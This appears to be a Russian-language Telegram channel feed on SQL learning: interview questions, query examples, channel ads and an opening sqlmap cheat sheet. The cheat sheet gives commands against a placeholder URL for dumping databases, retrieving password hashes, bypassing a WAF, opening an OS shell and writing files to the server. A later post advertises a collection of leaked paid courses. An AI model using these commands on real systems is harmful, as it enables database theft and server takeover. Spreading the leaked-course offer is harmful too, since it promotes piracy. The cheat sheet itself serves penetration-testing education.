SQL и БД Learning

🔐 Шпаргалка по использованию sqlmap SQLMAP — это инструмент для проникновения с открытым исходным кодом. SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных . Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение. 🌟 Базовый скан URL на наличие уязвимостей:

sqlmap -u "http://example.com/page.php?id=1"

🌟 Автоматический дамп всех баз данных:

sqlmap -u "http://example.com/page.php?id=1" --dbs

🌟 Извлечение таблиц из конкретной базы данных:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables

🌟 Извлечение данных из конкретной таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump

🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"

🌟 Подбор базы данных и получение информации о пользователях:

sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user

🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:

sqlmap -u "http://example.com/page.php?id=1" --os-shell

🌟 Выполнение SQL-запросов вручную:

sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"

🌟 Проверка на возможность подключения с правами администратора:

sqlmap -u "http://example.com/page.php?id=1" --is-dba

🌟 Брутфорсирование паролей пользователей:

sqlmap -u "http://example.com/page.php?id=1" --passwords

🌟 Загрузка файла на удаленный сервер:

sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"

🌟 Получение списка столбцов из таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns

🌟 Использование прокси-сервера:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

🌟 Определение используемой базы данных и версии:

sqlmap -u "http://example.com/page.php?id=1" --banner

🌟 Атака на POST-запросы (если параметры передаются в теле):

sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"

#Вопросы_с_собеседования ❓Выберите из таблицы workers все записи за первую декаду любого месяца 2016 года Ответ на картинке.

Шпаргалка по SQL (postgres), которая выручает меня на собесах Смотреть статью

#Вопросы_с_собеседования Вывести список клиентов, сделавших заказы в период с 1 января 2020 года по 31 декабря 2020 года Ответ на картинке.

Всем привет! На канале Бизнес, IT и статистика разбираются темы и вопросы, которые должен знать аналитик данных, имеющий опыт 3-6 лет. Все темы взяты из реальных вакансий, опубликованных на hh.ru.  Если вы являетесь аналитиком данных (начинающим или опытным) или работаете по смежной профессии, либо просто интересуетесь базами данных, Python, SQL, экономикой и финансами и всеми производными от этих тем - добро пожаловать на канал!  🟠Список разобранных вопросов: ✅Python: ▶️Эмбеддинги предложений ▶️Алгоритм кластеризации ▶️Кластеризация текстовой информации  ✅SQL и базы данных: ▶️PARTITION в SQL ▶️Какие бывают базы данных  ▶️Виды БД наглядно  ▶️ACID и BASE ▶️Обзор ClickHouse ▶️arraySort, arrayReverseSort и arrayFilter в ClickHouse  ✅А/Б тестирование: ▶️Основы А/Б тестов  ▶️А/Б тесты на практике  ▶️Математические методы проверки результатов  ▶️Инструменты А/Б тестирования  ✅OLAP-кубы  ✅Статистика: ▶️Парадокс Симпсона  🟠В ближайшем будущем будем разбирать: ▶️Больше про базы данных, архитектуру и т.п. ▶️SQL (в частности вложенные запросы, процедуры, функции, пакеты, циклы, курсор) ▶️Больше питоновских библиотек ▶️Hadoop, Airflow, Hive, Clickhouse, pyspark ▶️BI инструменты ▶️Apache Zeppelin, Apache Superset, Redash + советы и наблюдения из практики, немного про экономику и статистику и актуальные тематические новости Реклама. Куликов М.Д. ИНН 502413079218. erid: 2W5zFJHcymJ

#Вопросы_с_собеседования ❓Переименуйте таблицу table2 в table3 Ответ на картинке.

SQL — Числовые функции. Подробная шпаргалка. Смотреть

DROP COLUMN Чтобы удалить определенный столбец из таблицы, мы сделаем следующее.

#Вопросы_с_собеседования ❓Получите SQL запросом все возрасты без дублирования Ответ картинке.

#Вопросы_с_собеседования ❓Объясните различные типы нормализации Существует много последовательных уровней нормализации. Это так называемые нормальные формы. Каждая последующая нормальная форма включает предыдущую. Первых трех нормальных форм обычно достаточно. • Первая нормальная форма (1NF) — нет повторяющихся групп в строках • Вторая нормальная форма (2NF) — каждое неключевое (поддерживающее) значение столбца зависит от всего первичного ключа • Третья нормальная форма (3NF) — каждое неключевое значение зависит только от первичного ключа и не имеет зависимости от другого неключевого значения столбца

LeetCode теперь в Telegram! LeetCode — это сайт, который позволяет быстро готовиться к техническим собеседованиям по программированию. Там публикуются задачи с собеседований в Google и Microsoft с решениями. Подписывайтесь: @leetcode

#Вопросы_с_собеседования ❓Выберите из таблицы workers все записи так, чтобы вместо id было userId, вместо login – userLogin, вместо salary - userSalary Ответ на картинке.

#Вопросы_с_собеседования Удержание пользователей в месяц Контекст: допустим, у нас есть статистика по авторизации пользователей на сайте в таблице logins: | user_id | date | |---------|------------| | 1 | 2018-07-01 | | 234 | 2018-07-02 | | 3 | 2018-07-02 | | 1 | 2018-07-02 | | ... | ... | | 234 | 2018-10-04 | Задача: написать запрос, который получает количество удержанных пользователей в месяц. В нашем случае данный параметр определяется как количество пользователей, которые авторизовались в системе и в этом, и в предыдущем месяце. Решение: SELECT DATE_TRUNC('month', a.date) month_timestamp, COUNT(DISTINCT a.user_id) retained_users FROM logins a JOIN logins b ON a.user_id = b.user_id AND DATE_TRUNC('month', a.date) = DATE_TRUNC('month', b.date) + interval '1 month' GROUP BY date_trunc('month', a.date)

Как полностью очистить таблицу sql Полностью очистить таблицу, не удаляя её можно с помощью запроса DELETE. Мы указываем имя таблицы, но опускаем блок WHERE. Тогда удаляются абсолютно все записи, вне зависимости от условий. DELETE FROM wiped_table_name; -- Мы очистили таблицу wiped_table_name Кроме DELETE без условий можно использовать TRUNCATE. У неё есть свои особенности. Самая главная, она быстрее DELETE, так как не сканирует таблицы перед очисткой и наиболее полезна для очистки больших таблиц. TRUNCATE cars, cups, parrots; -- Тут можно перечислять сколько угодно таблиц

Друзья, на связи ваш админ. Я тут сделал бота для знакомств @tinder. Буду рад, если вы оцените и воспользуетесь. Если буду какие-то замечания, пишите, буду благодарен)

Извлекаем имя из адреса электронной почты Где "YourTable" - это название вашей таблицы, содержащей столбец с адресами электронной почты. Этот запрос использует функцию "LEFT", чтобы извлечь часть строки до символа "@", а функция "CHARINDEX" используется для нахождения позиции символа "@". Результат запроса будет содержать столбец с именами, извлеченными из адресов электронной почты.

#Вопросы_с_собеседования ❓В чем разница между кластерными и некластеризованными индексами? Ответ на картинке.

⚡️ В сети начали массово сливать курсы и книги известных онлайн школ Вот отсортированная база с тонной материала(постепенно пополняется): БАЗА (4687 видео/книг): (363 видео, 87 книги) — Python (415 видео, 68 книги) — Frontend (143 видео, 33 книги) — ИБ/Хакинг (352 видео, 89 книги) — С/С++ (343 видео, 87 книги) — Java (176 видео, 32 книги) — Git (293 видео, 63 книги) — C# (174 видео, 91 книги) — DevOps (167 видео, 53 книги) — PHP (227 видео, 83 книги) — SQL/БД (163 видео, 29 книги) — Linux (107 видео, 43 книги) — СисАналз (181 видео, 32 книги) — Go (167 видео, 43 книги) — Kotlin/Swift (112 видео, 24 книги) — Flutter (137 видео, 93 книги) — DS/ML (113 видео, 82 книги) — GameDev (183 видео, 37 книги) — UI/UX (129 видео, 73 книги) — QA (213 видео, 63 книги) — Rust (121 видео, 24 книги) — Ruby Скачивать ничего не нужно — все выложили в Telegram

Количество вхождений строки в поле в MySQL Есть таблица items со следующими данными: id desc 1 val test test val 2 val test 3 test test test 4 valvalvalvalval Напишите MySQL запрос, который подсчитает количество вхождений значения ‘val‘ для каждого desc. Ожидаемый результат: 2 1 0 5 Решение: SELECT ROUND ( (LENGTH (desc) - LENGTH ( REPLACE (desc, ‘val‘,‘‘) )) / LENGTH(‘val‘)) AS c FROM items;